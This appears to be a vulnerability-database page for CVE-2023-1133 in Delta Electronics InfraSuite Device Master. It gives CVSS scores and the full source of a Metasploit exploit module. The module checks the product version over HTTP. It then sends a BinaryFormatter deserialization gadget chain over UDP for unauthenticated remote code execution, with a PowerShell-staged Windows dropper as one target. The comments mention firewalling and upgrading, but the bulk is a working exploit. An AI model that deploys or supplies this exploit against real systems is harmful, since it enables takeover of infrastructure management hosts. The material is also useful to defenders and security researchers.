Delta Electronics InfraSuite Device Master Deserialization

2023-06-01 22:57:57
Anonymous, Shelby Pace
www.rapid7.com

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.108 Low

EPSS

Percentile

95.1%

Delta Electronics InfraSuite Device Master versions below v1.0.5 have an unauthenticated .NET deserialization vulnerability within the ‘ParseUDPPacket()’ method of the ‘Device-Gateway-Status’ process. The ‘ParseUDPPacket()’ method reads user-controlled packet data and eventually calls ‘BinaryFormatter.Deserialize()’ on what it determines to be the packet header without appropriate validation, leading to unauthenticated code execution as the user running the ‘Device-Gateway-Status’ process.

# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework

# Exploit module for CVE-2023-1133: unauthenticated .NET deserialization in the
# 'Device-Gateway-Status' process of Delta Electronics InfraSuite Device Master.
#
# Two network surfaces are used: HTTP (INFRASUITE_PORT, default 80) only for the
# version check, and UDP (RPORT, default 10100) for the actual deserialization
# packet. Both are unauthenticated, so a firewall rule limiting UDP/10100 to the
# hosts that legitimately send gateway status, and upgrading to v1.0.5 or later,
# are the relevant mitigations. The 'SideEffects' note below records that the
# check and the delivered payload leave traces in logs and on disk.
class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::Udp
  prepend Msf::Exploit::Remote::AutoCheck # runs #check before #exploit unless disabled

  # Registers module metadata and the user-facing options.
  #
  # @param info [Hash] framework-supplied module info merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Delta Electronics InfraSuite Device Master Deserialization',
        'Description' => %q{
          Delta Electronics InfraSuite Device Master versions below v1.0.5 have an
          unauthenticated .NET deserialization vulnerability within the 'ParseUDPPacket()'
          method of the 'Device-Gateway-Status' process.

          The 'ParseUDPPacket()' method reads user-controlled packet data and eventually
          calls 'BinaryFormatter.Deserialize()' on what it determines to be the packet header without appropriate validation,
          leading to unauthenticated code execution as the user running the 'Device-Gateway-Status' process.
        },
        'Author' => [
          'Anonymous', # Vulnerability discovery
          'Shelby Pace' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2023-1133'],
          ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-23-672/'],
          ['URL', 'https://attackerkb.com/topics/owl4Xz8fKW/cve-2023-1133']
        ],
        'Platform' => 'win',
        'Privileged' => false, # code runs as whatever account owns Device-Gateway-Status
        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
        'Targets' => [
          [
            'Windows EXE Dropper',
            {
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :windows_dropper,
              'CmdStagerFlavor' => :psh_invokewebrequest # stages via PowerShell Invoke-WebRequest
            }
          ],
          [
            'Windows CMD',
            {
              'Arch' => [ARCH_CMD],
              'Type' => :windows_cmd
            }
          ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2023-05-17',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          # Detection hint: the dropper target writes to disk and the HTTP probes in
          # #check appear in the web server's access log.
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS, SCREEN_EFFECTS],
          'Reliability' => [REPEATABLE_SESSION]
        }
      )
    )

    register_options([
      Opt::RPORT(10100), # UDP port of the Device-Gateway-Status listener
      OptInt.new('INFRASUITE_PORT', [ true, 'The port on which the InfraSuite Manager is listening', 80 ]),
      OptString.new('TARGETURI', [ true, 'The base path to the InfraSuite Manager', '/' ])
    ])
  end

  # Fingerprints the target over HTTP and compares the advertised version with 1.0.5.
  #
  # Issues two unauthenticated GET requests against INFRASUITE_PORT:
  # TARGETURI/login.html (product identification) and TARGETURI/js/webcfg.js
  # (version string inside the 'devicemasterCfg' object).
  #
  # @return [Msf::Exploit::CheckCode] Unknown when no HTTP response is received,
  #   Safe when the login page is not InfraSuite or the version is >= 1.0.5,
  #   Detected when the product is found but the version cannot be parsed,
  #   Appears when the parsed version is below 1.0.5
  def check
    print_status('Requesting the login page to determine if target is InfraSuite Device Master...')
    res = send_request_cgi(
      'method' => 'GET',
      'rport' => datastore['INFRASUITE_PORT'],
      'uri' => normalize_uri(target_uri.path, 'login.html')
    )

    return CheckCode::Unknown unless res

    unless res.body.include?('InfraSuite Manager Login')
      return CheckCode::Safe('Target does not appear to be InfraSuite Device Master.')
    end

    print_status('Target is InfraSuite Device Master. Now attempting to determine version.')
    res = send_request_cgi(
      'method' => 'GET',
      'rport' => datastore['INFRASUITE_PORT'],
      'uri' => normalize_uri(target_uri.path, 'js/webcfg.js')
    )

    # Safe navigation: the second request may fail independently of the first.
    unless res&.body&.include?('var devicemasterCfg')
      return CheckCode::Detected('Discovered InfraSuite Device Master, but couldn\'t determine version.')
    end

    # Accepts dotted numeric versions with an optional trailing letter, e.g. 1.0.4 or 1.0.4a.
    version = res.body.match(/version:'(\d+(?:\.\d+)+[a-zA-Z]?)'/)
    unless version && version.length > 1
      return CheckCode::Detected('Failed to find version string')
    end

    version = version[1]
    vprint_status("Found version '#{version}' of InfraSuite Device Master")
    # Rex::Version gives a numeric comparison; a plain string compare would misorder
    # multi-digit components.
    r_vers = Rex::Version.new(version)

    return CheckCode::Appears if r_vers < Rex::Version.new('1.0.5')

    CheckCode::Safe
  end

  # Opens the UDP socket (closed again in #cleanup) and dispatches on the target type.
  # The dropper target hands control to the CmdStager, which calls #execute_command
  # for each staged command; the CMD target sends the encoded payload once.
  def exploit
    connect_udp
    case target['Type']
    when :windows_dropper
      execute_cmdstager
    when :windows_cmd
      execute_command(payload.encoded)
    end
  end

  # Serializes +cmd+ into a BinaryFormatter gadget chain and sends it as one UDP datagram.
  #
  # Packet layout, as built below: a single 0x01 type byte, a 2-byte big-endian
  # length of the serialized body ('n' pack format), then the body itself.
  # NOTE(review): pack('n') silently truncates a length above 0xffff; the framework
  # gadget output is assumed to stay well below that — confirm if larger payloads are used.
  #
  # @param cmd [String] command to be executed on the target
  # @param _opts [Hash] unused; present for CmdStager's calling convention
  def execute_command(cmd, _opts = {})
    serialized = ::Msf::Util::DotNetDeserialization.generate(
      cmd,
      gadget_chain: :ClaimsPrincipal,
      formatter: :BinaryFormatter
    )

    pkt = "\x01#{[ serialized.length ].pack('n')}#{serialized}"
    udp_sock.put(pkt)
  end

  # Releases the UDP socket opened in #exploit; the framework calls this after exploitation.
  def cleanup
    disconnect_udp
  end
end
